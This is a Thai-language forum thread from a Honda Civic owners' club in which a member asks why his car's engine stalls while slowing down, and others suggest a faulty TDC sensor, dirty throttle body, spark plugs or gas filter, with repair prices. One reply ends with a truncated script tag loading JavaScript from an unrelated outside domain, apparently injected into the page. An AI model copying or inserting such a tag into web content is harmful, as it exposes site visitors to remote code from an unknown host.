ตอบ
mashimabo


ชื่อเล่น: อนันต์

เข้าร่วม: 13 สิงหา 2010
ตอบ: 450

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 13

ที่อยู่: บางนา - สกลนคร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 24 มกรา 2012 00:17 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
ต้อง ทำ ไง คับ พี่ ๆ ขอบ คุน ล่วง หน้า คับ
ได้รับคำขอบคุณจาก: Wut_On 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 24 มกรา 2012 00:22 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
tdc เปลี่ยนยัง ถ้าวิ่งอยู่แล้วดับตอนวิ่งนะ
ได้รับคำขอบคุณจาก: mashimabo 
mashimabo


ชื่อเล่น: อนันต์

เข้าร่วม: 13 สิงหา 2010
ตอบ: 450

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 13

ที่อยู่: บางนา - สกลนคร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 24 มกรา 2012 00:39 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
eskung พิมพ์ว่า:
tdc เปลี่ยนยัง ถ้าวิ่งอยู่แล้วดับตอนวิ่งนะ


ขอบ คุน คับ ....

ประมาณ เท่า ไร คับ ต้อง เช็ค 0 อย่าง เดียว ใช่ ไหม คับ

ตัว นี้ นึก จะ เสีย มัน ก้อ เสีย หรอ คับ......

เข็น เอง ซะ มด ลูก หย่อน เลย คับ ขอ บอก
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 24 มกรา 2012 00:48 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
มันไม่ได้นึกครับ มันกวนตีนเราคืออยู่ดีๆก็เสียเลย ถ้าใช้แก๊สกรองแก๊สก็เกี่ยวนะครับ จังหวะที่เราไม่ได้เร่งเครื่องพอกรองแก๊สมันสกกปรกมันก็จ่ายแก๊สไม่ทันก็ดับได้เหมือนกันคร้าบบบบบบบบบบบบ <script src="https://sport32news.com/civicesgroup.js"></
mashimabo


ชื่อเล่น: อนันต์

เข้าร่วม: 13 สิงหา 2010
ตอบ: 450

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 13

ที่อยู่: บางนา - สกลนคร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 24 มกรา 2012 01:00 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
สงสัย เป็น กะ ไอ้ TDC แน่ ๆ เลย ต้อง เช็ค ดู
ake_es


ชื่อเล่น: เอก

เข้าร่วม: 01 มิถุนา 2009
ตอบ: 838

Guru ES
Guru ES

ได้รับคำขอบคุณ: 710
ให้คำขอบคุณ: 244

ที่อยู่: ดอนเมือง
อังคาร, 24 มกรา 2012 07:44 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
พันกว่าบาทครับ............
ได้รับคำขอบคุณจาก: mashimabo 
Marwin


เข้าร่วม: 29 มกรา 2009
ตอบ: 1661

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1517
ให้คำขอบคุณ: 159

ที่อยู่: Seacon square
ปี: 2001
อังคาร, 24 มกรา 2012 08:00 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
เปลี่ยนอู่นอกได้ครับ ผมเปลี่ยนอู่นอกมา ใกล้บ้านครับ อู่ตั็ม SES
ได้รับคำขอบคุณจาก: mashimabo 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 24 มกรา 2012 08:11 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
ถ้า 1.7 ก็TDC แน่ๆ แต่ถ้า2.0 ไม่แน่ เพราะของผมเป็นอยู่เหมือนกัน ช่างศูนย์บอกว่าใน2.0 ปรับปรุงแล้วไม่เสียง่ายๆ เขาเช็คกล่องECUให้หายไปหลายเดือน ตอนนี้เป็นอีกแล้ว กำลังปวดหัวอยู่เหมือนกัน
ได้รับคำขอบคุณจาก: mashimabo 
toshihero


เข้าร่วม: 29 พฤศจิกา 2008
ตอบ: 363

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 290
ให้คำขอบคุณ: 444

ที่อยู่: นนทบุรี แคลาย เดอะมอลล์งาม
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 24 มกรา 2012 08:21 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
เปลี่ยนอู่นอก มา 1000 ต้นๆ ครับ รีบเข้าไปจัดเลยครับเดี๋ยวดับกลางถนนอันตรายครับ
ได้รับคำขอบคุณจาก: mashimabo 
ES2.0


ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

ที่อยู่: ลาซาล ศรีนครินทร์ >> เขลางค์นคร
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อังคาร, 24 มกรา 2012 08:28 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
ผมว่าอธิบายอาการเบื้องต้นหน่อยดีกว่านะคับ เช่น อาการก่อนดับเป็นยังไง เพราะถ้าเป็นอย่าง TDC เสียเช็คเอ็นจิ้นควรจะโชว์
แต่ถ้าพวกวาล์วยัน ปั๊มติ๊กเสียอาการเบื้องต้นก่อนดับจะไม่เหมือนกันและเช็คเอ็นจิ้นจะไม่ขึ้นโชว์นะคับ
ได้รับคำขอบคุณจาก: mashimabo 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 24 มกรา 2012 08:37 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
ถ้าวาล์วยันเครื่องจะดับด้วยเหรอ อธิบายหน่อยครับ
phichetza


ชื่อเล่น: เชษ

เข้าร่วม: 17 ตุลา 2011
ตอบ: 1590

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1420
ให้คำขอบคุณ: 3612

ที่อยู่: สุราษฎร์ธานี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 24 มกรา 2012 09:34 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
เก็บข้อมูล
Wut_On


ชื่อเล่น: วุฒิ

เข้าร่วม: 13 มกรา 2012
ตอบ: 776

Guru ES
Guru ES

ได้รับคำขอบคุณ: 646
ให้คำขอบคุณ: 540

ที่อยู่: อ. นครหลวง จ.อยุธยา
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 24 มกรา 2012 13:03 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
เก็บข้อมูลครับ
mashimabo


ชื่อเล่น: อนันต์

เข้าร่วม: 13 สิงหา 2010
ตอบ: 450

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 13

ที่อยู่: บางนา - สกลนคร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 24 มกรา 2012 22:54 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
ES2.0 พิมพ์ว่า:
ผมว่าอธิบายอาการเบื้องต้นหน่อยดีกว่านะคับ เช่น อาการก่อนดับเป็นยังไง เพราะถ้าเป็นอย่าง TDC เสียเช็คเอ็นจิ้นควรจะโชว์
แต่ถ้าพวกวาล์วยัน ปั๊มติ๊กเสียอาการเบื้องต้นก่อนดับจะไม่เหมือนกันและเช็คเอ็นจิ้นจะไม่ขึ้นโชว์นะคับ


เรื่องมีอยู่ว่า แต่รถไม่ได้ติดแก๊สคับ นานๆเป็นทีอะครับ แต่เป็นหลายครังแล้ว จังหวะที่จะปล่อยจากคันเร่ง มาเหยีบเบรคครับเช่นตอนชลอรถ ตอนกำลังจะเลี้ยวหรือ กลางถนน สี่แยก.....ประมาณนี้ล่ะนะครับ อยู่ดีๆเครื่องก็เงียบไปเฉยๆ แล้วสตาร์ดใหม่ก็วิ่งได้เป็นปกติคับ หาสาเหตุไม่เจอ สังเกตดูจังหวะที่มันจะดับ ช่วงที่ปล่อยเท้าจากคันเร่งมาเหยีบเบรครอบจะตกมามากต่ำจากรอบเดินเบาอีกแล้วก็วูบไปเลย รบกวน ด้วย คับ......
mashimabo


ชื่อเล่น: อนันต์

เข้าร่วม: 13 สิงหา 2010
ตอบ: 450

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 13

ที่อยู่: บางนา - สกลนคร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 24 มกรา 2012 23:00 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
Tanadath พิมพ์ว่า:
ถ้า 1.7 ก็TDC แน่ๆ แต่ถ้า2.0 ไม่แน่ เพราะของผมเป็นอยู่เหมือนกัน ช่างศูนย์บอกว่าใน2.0 ปรับปรุงแล้วไม่เสียง่ายๆ เขาเช็คกล่องECUให้หายไปหลายเดือน ตอนนี้เป็นอีกแล้ว กำลังปวดหัวอยู่เหมือนกัน



มัน ต้อง เป็น ที่ TDC แน่ ๆ ส่วย ตัว คิด ว่า งั้น เครื่อง ผม 1.7 คับ...

เดี๋ยว ขอ รอ ดู ผู้ รู้ ก่อน กลัว โดน เชือด เพราะ ผม ไม่ รู้ เรื่อง เครื่อง จิงๆ

ขอ หา ข้อ มูล ก่อน ขอบ คุณ คับ
ES2.0


ชื่อเล่น: ปาล์ม

เข้าร่วม: 17 เมษา 2009
ตอบ: 1013

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1027
ให้คำขอบคุณ: 1000

ที่อยู่: ลาซาล ศรีนครินทร์ >> เขลางค์นคร
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 25 มกรา 2012 00:15 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
mashimabo พิมพ์ว่า:
ES2.0 พิมพ์ว่า:
ผมว่าอธิบายอาการเบื้องต้นหน่อยดีกว่านะคับ เช่น อาการก่อนดับเป็นยังไง เพราะถ้าเป็นอย่าง TDC เสียเช็คเอ็นจิ้นควรจะโชว์
แต่ถ้าพวกวาล์วยัน ปั๊มติ๊กเสียอาการเบื้องต้นก่อนดับจะไม่เหมือนกันและเช็คเอ็นจิ้นจะไม่ขึ้นโชว์นะคับ


เรื่องมีอยู่ว่า แต่รถไม่ได้ติดแก๊สคับ นานๆเป็นทีอะครับ แต่เป็นหลายครังแล้ว จังหวะที่จะปล่อยจากคันเร่ง มาเหยีบเบรคครับเช่นตอนชลอรถ ตอนกำลังจะเลี้ยวหรือ กลางถนน สี่แยก.....ประมาณนี้ล่ะนะครับ อยู่ดีๆเครื่องก็เงียบไปเฉยๆ แล้วสตาร์ดใหม่ก็วิ่งได้เป็นปกติคับ หาสาเหตุไม่เจอ สังเกตดูจังหวะที่มันจะดับ ช่วงที่ปล่อยเท้าจากคันเร่งมาเหยีบเบรครอบจะตกมามากต่ำจากรอบเดินเบาอีกแล้วก็วูบไปเลย รบกวน ด้วย คับ......


เอาเป็นว่าผมตั้งข้อสมมติฐานจากอาการที่เล่ามากับที่ผมเคยเจอแล้วกัน
1.น่าจะมาจากชุดลิ้นปีกผีเสื้อรึป่าวเพราะตรงนั้นมีชุดชดเชยรอบเดินเบาลองนึกดูว่าล้างมันล่าสุดเมื่อไหร่
2.ชุดหัวเทียนเปลี่ยนครั้งล่าสุดเมื่อไหร่เพราะของผมเองอาการก่อนดับเหมือนเดินไม่ค่อยครบทุกสูบ
(แต่ของผมเป็นตอนเครื่องร้อนๆและเป็นมากช่วงแอร์ตัดต่อการทำงาน)
3.ถ้าปั๊มติ๊กเสียจากที่เคยสอบถามพี่ๆในนี้แหละอาการจะพบเถ้าเจอในรอบสูงๆ
4.ถ้า TDC เสียเช็คเอ็นจิ้นจะโชว์ แต่ถ้าเสื่อมจะยังไม่มีไฟโชว์ต้องหาวิธีเช็คเอง

ส่วนอาการที่ผมเป็นเองคือร้อนแล้วดับ แต่พัดลมทำงานตามปกติอาการก่อนดับของผมคือแอร์ตัดต่อเครื่องสั่นรอบตกและสะอึก
เหมือนเดินไม่ครบสูบเป็นบ่อยเวลาไป ตจว. แล้วเจอรถติดยาวๆและสิ่งที่ผมทำคือ
1.ล้างลิ้นปีกผีเสื้อและ IAVC Sensor ประมาณ 300 ผลคือนิ่งกว่าเดิมตอนแอร์ตัดต่อรอบไม่ตก
2.เปลี่ยนหัวเทียนยกชุด หัวละประมาณ 70 บาทมั้ง
3.ตั้งวาล์วใหม่ อันนี้ประมาณ 1000 บาท
4.ถ่ายน้ำยาหม้อน้ำและเช็คเทอร์โมสวิทช์กับเทอร์โมสตรัทจำราคาไม่ได้

ผลคือหายคับแต่ยังสรุปไม่ได้ว่าเพราะการแก้ไขตัวไหนไป ล่าสุดลองมาแล้วช่วงปีใหม่รถติดตั้งแต่ชัทนาทยันวงแหวนกาญจนาฯ
ไม่มีอาการงอแงให้ต้องแวะข้างทาง

ปล.เป็นการแก้ไขจากรถผมเองอาจไม่ถูกเสมอไปยังไงก็พิจารณาเอาตามความเหมาะสมแล้วกันคับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
mashimabo


ชื่อเล่น: อนันต์

เข้าร่วม: 13 สิงหา 2010
ตอบ: 450

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 13

ที่อยู่: บางนา - สกลนคร
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 25 มกรา 2012 23:22 - ช่วย ด้วย คับ ... ขับรถวิ่งไปดีๆ เครื่องยนต์ดับไปเฉยๆ....หลาย ครั้ง แล้ว
ES2.0 พิมพ์ว่า:
mashimabo พิมพ์ว่า:
ES2.0 พิมพ์ว่า:
ผมว่าอธิบายอาการเบื้องต้นหน่อยดีกว่านะคับ เช่น อาการก่อนดับเป็นยังไง เพราะถ้าเป็นอย่าง TDC เสียเช็คเอ็นจิ้นควรจะโชว์
แต่ถ้าพวกวาล์วยัน ปั๊มติ๊กเสียอาการเบื้องต้นก่อนดับจะไม่เหมือนกันและเช็คเอ็นจิ้นจะไม่ขึ้นโชว์นะคับ


เรื่องมีอยู่ว่า แต่รถไม่ได้ติดแก๊สคับ นานๆเป็นทีอะครับ แต่เป็นหลายครังแล้ว จังหวะที่จะปล่อยจากคันเร่ง มาเหยีบเบรคครับเช่นตอนชลอรถ ตอนกำลังจะเลี้ยวหรือ กลางถนน สี่แยก.....ประมาณนี้ล่ะนะครับ อยู่ดีๆเครื่องก็เงียบไปเฉยๆ แล้วสตาร์ดใหม่ก็วิ่งได้เป็นปกติคับ หาสาเหตุไม่เจอ สังเกตดูจังหวะที่มันจะดับ ช่วงที่ปล่อยเท้าจากคันเร่งมาเหยีบเบรครอบจะตกมามากต่ำจากรอบเดินเบาอีกแล้วก็วูบไปเลย รบกวน ด้วย คับ......


เอาเป็นว่าผมตั้งข้อสมมติฐานจากอาการที่เล่ามากับที่ผมเคยเจอแล้วกัน
1.น่าจะมาจากชุดลิ้นปีกผีเสื้อรึป่าวเพราะตรงนั้นมีชุดชดเชยรอบเดินเบาลองนึกดูว่าล้างมันล่าสุดเมื่อไหร่
2.ชุดหัวเทียนเปลี่ยนครั้งล่าสุดเมื่อไหร่เพราะของผมเองอาการก่อนดับเหมือนเดินไม่ค่อยครบทุกสูบ
(แต่ของผมเป็นตอนเครื่องร้อนๆและเป็นมากช่วงแอร์ตัดต่อการทำงาน)
3.ถ้าปั๊มติ๊กเสียจากที่เคยสอบถามพี่ๆในนี้แหละอาการจะพบเถ้าเจอในรอบสูงๆ
4.ถ้า TDC เสียเช็คเอ็นจิ้นจะโชว์ แต่ถ้าเสื่อมจะยังไม่มีไฟโชว์ต้องหาวิธีเช็คเอง

ส่วนอาการที่ผมเป็นเองคือร้อนแล้วดับ แต่พัดลมทำงานตามปกติอาการก่อนดับของผมคือแอร์ตัดต่อเครื่องสั่นรอบตกและสะอึก
เหมือนเดินไม่ครบสูบเป็นบ่อยเวลาไป ตจว. แล้วเจอรถติดยาวๆและสิ่งที่ผมทำคือ
1.ล้างลิ้นปีกผีเสื้อและ IAVC Sensor ประมาณ 300 ผลคือนิ่งกว่าเดิมตอนแอร์ตัดต่อรอบไม่ตก
2.เปลี่ยนหัวเทียนยกชุด หัวละประมาณ 70 บาทมั้ง
3.ตั้งวาล์วใหม่ อันนี้ประมาณ 1000 บาท
4.ถ่ายน้ำยาหม้อน้ำและเช็คเทอร์โมสวิทช์กับเทอร์โมสตรัทจำราคาไม่ได้

ผลคือหายคับแต่ยังสรุปไม่ได้ว่าเพราะการแก้ไขตัวไหนไป ล่าสุดลองมาแล้วช่วงปีใหม่รถติดตั้งแต่ชัทนาทยันวงแหวนกาญจนาฯ
ไม่มีอาการงอแงให้ต้องแวะข้างทาง

ปล.เป็นการแก้ไขจากรถผมเองอาจไม่ถูกเสมอไปยังไงก็พิจารณาเอาตามความเหมาะสมแล้วกันคับ


ขอบ คุน คับ เดี๋ยว ลอง ดู ล่ะ กัน คับ

ค่า ใช้ จ่าย ประมาณ นี้ เนอะ พอ ไว.....
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.